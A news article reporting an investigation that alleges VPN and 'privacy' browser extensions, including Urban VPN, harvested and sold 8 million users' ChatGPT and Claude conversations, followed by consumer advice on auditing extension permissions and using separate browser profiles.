8 Million Users' ChatGPT and Claude Conversations Harvested by 'Privacy' Browser Extensions
The browser extensions promising to protect your privacy may be doing the opposite. A new investigation reveals that extensions marketed as VPN and privacy tools have allegedly been harvesting AI conversations from 8 million users and selling the data for profit.
The investigation, published by Koi AI, found that extensions including Urban VPN were capturing users' conversations with AI assistants like ChatGPT, Claude, and other services. The extensions then allegedly sold this conversational data—which often contains sensitive personal and professional information—to third parties.
The Privacy Paradox: Extensions That Spy on Your AI Chats
The irony is brutal: users installed these extensions specifically to enhance their privacy. Instead, they got surveillance. Browser extensions have broad permissions by design—they need access to your browsing activity to function. But that same access creates an attack surface that bad actors can exploit.
AI conversations are particularly valuable data. People tell ChatGPT and Claude things they wouldn't type into Google: business strategies, personal problems, code with proprietary logic, medical questions, financial details. This isn't search history. It's intimate intellectual output.
The 8 million affected users trusted these tools with their browsing. That trust was monetized.
How Browser Extension Surveillance Works
Browser extensions can read and modify webpage content. A VPN extension legitimately needs some network access, but it doesn't need to read your ChatGPT conversations. The extensions in question allegedly exceeded their stated purpose, capturing form inputs and conversation text from AI platforms.
This data collection often happens invisibly. Users see an active VPN indicator and assume they're protected. Meanwhile, every prompt and response flows through the extension's logging system before reaching its destination—or after arriving from OpenAI and Anthropic's servers.
The captured conversations were allegedly packaged and sold. Who bought them? The investigation doesn't say. But the market for AI training data is hot, and real human conversations with AI systems are valuable for fine-tuning models.
Protecting Your AI Conversations
The lesson isn't to avoid all browser extensions—it's to be ruthless about which ones you trust.
Audit your extensions now. Open your browser's extension manager and examine what's installed. For each extension, ask: Does this need to read my data on all websites? Free VPN extensions are particularly risky; the service has to pay for servers somehow, and if you're not paying with money, you're paying with data.
Use dedicated apps when possible. OpenAI's desktop app for ChatGPT and Anthropic's Claude app bypass the browser entirely. No extensions can intercept those conversations.
Check permissions before installing. Chrome and Firefox show what access an extension requests. "Read and change all your data on all websites" is a red flag for any extension that doesn't absolutely need it.
Consider browser profiles. Use a clean browser profile—with zero extensions—for sensitive AI work. Keep your extension-heavy profile for casual browsing.
The Bigger Picture
This incident exposes a growing problem: AI interfaces have become some of our most sensitive digital surfaces, but we interact with them through browsers laden with third-party code. The browser extension model, designed decades ago, wasn't built for a world where people share their deepest thoughts with AI assistants.
OpenAI and Anthropic encrypt conversations in transit and at rest. But that security ends where your browser begins. Your extensions see everything, decrypted and ready to harvest.
Eight million users learned that the hard way.